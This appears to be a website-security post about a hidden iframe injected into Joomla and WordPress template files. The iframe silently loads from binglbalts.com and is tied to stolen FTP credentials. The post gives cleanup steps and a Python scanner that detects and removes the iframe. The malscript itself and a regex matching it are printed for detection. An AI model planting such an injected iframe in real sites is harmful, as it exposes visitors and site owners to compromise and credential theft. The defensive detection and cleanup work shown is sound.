Attack of the binglbalts
We started seeing a lot of websites infected with a malscript that looks like:
<iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '></iframe>
In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.
We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.
It turns out the result of these infections has been stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com and we can see the IP addresses of where the infection is coming from.
To clean this, first change all FTP passwords.
Second, you’ll have to download your entire site onto your PC or Mac. Then search the downloaded copy with grepWin, using this regular expression as the search string:
iframe\s*frameborder=\"0\" onload=\' if \(\!this\.src\)\s*\{\s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;\s*\} \'>
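The same search-and-clean step can be scripted over the downloaded copy. The script below is an added example, not part of the original post: it reports every file containing the injected iframe and, with fix=True, strips it. The file-extension list and the sample theme path are assumptions, and the sample site is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Byte regex adapted from the page's search string: \s* tolerates whitespace
# changes, and the optional </iframe> lets the whole element be removed.
INJECTED = re.compile(
    rb"""<iframe\s+frameborder="0"\s+onload='\s*if\s*\(!this\.src\)\s*\{\s*"""
    rb"""this\.src="http://binglbalts\.com/grep/";\s*this\.height=0;\s*"""
    rb"""this\.width=0;\s*\}\s*'>(?:\s*</iframe>)?""",
    re.IGNORECASE,
)
SCAN_EXT = {".php", ".html", ".htm", ".js", ".tpl"}  # assumed file types

def scan_site(root, fix=False):
    """Return {relative_path: hit_count}; with fix=True also strip the iframe."""
    root, hits = Path(root), {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXT:
            continue
        data = path.read_bytes()  # bytes keep encoding and line endings intact
        cleaned, n = INJECTED.subn(b"", data)
        if n:
            hits[path.relative_to(root).as_posix()] = n
            if fix:
                path.write_bytes(cleaned)
    return hits

def build_sample(root):
    """Constructed sample site: one infected WordPress footer, one clean file."""
    theme = Path(root) / "wp-content" / "themes" / "example"  # hypothetical path
    theme.mkdir(parents=True)
    (theme / "footer.php").write_bytes(
        b"<?php wp_footer(); ?>\n<iframe frameborder=\"0\" onload=' if (!this.src)"
        b" { this.src=\"http://binglbalts.com/grep/\"; this.height=0;"
        b" this.width=0; } '></iframe>\n</body>\n")
    (theme / "index.php").write_bytes(b"<?php get_header(); ?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample(site)
        print("found:  ", scan_site(site))
        print("cleaned:", scan_site(site, fix=True))
        print("rescan: ", scan_site(site))
```

Run it first without fix=True to review the list of affected files, then re-run the scan after cleaning to confirm nothing is left before uploading the site again.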